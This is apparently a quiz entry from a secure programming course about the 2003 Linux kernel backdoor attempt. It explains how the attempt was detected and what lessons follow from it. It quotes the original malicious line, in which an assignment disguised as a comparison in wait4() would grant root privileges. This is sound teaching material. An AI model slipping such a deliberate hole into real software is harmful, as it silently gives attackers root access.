LOGBOOK

HELP

Quiz Entry - updated: 2026.06.23

Describe the 2003 Linux kernel backdoor attempt and what security control prevented it.

A one-character backdoor (= instead of ==) that silently granted root; it was caught because the source control tracked change provenance and the sneaky commit lacked it.

It was a single-character change (= instead of ==) that would have granted root privileges to any process.

if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
    retval = -EINVAL;

The trick: uid = 0 is an assignment (not comparison uid == 0). This would silently grant root privileges to any process calling wait4() with specific options.

Why it failed:

  • Inserted into CVS mirror, not the main BitKeeper repository
  • BitKeeper required approval records for code changes
  • The CVS commit lacked this metadata → discrepancy noticed during verification

Lessons:

  • Use source control that tracks provenance of changes
  • Code review should catch = vs == errors
  • Compilers can warn about assignments in conditionals (-Wall)
  • Even subtle one-character changes can be catastrophic

From Quiz: SPRG / Secure Programming Introduction | Updated: Jun 23, 2026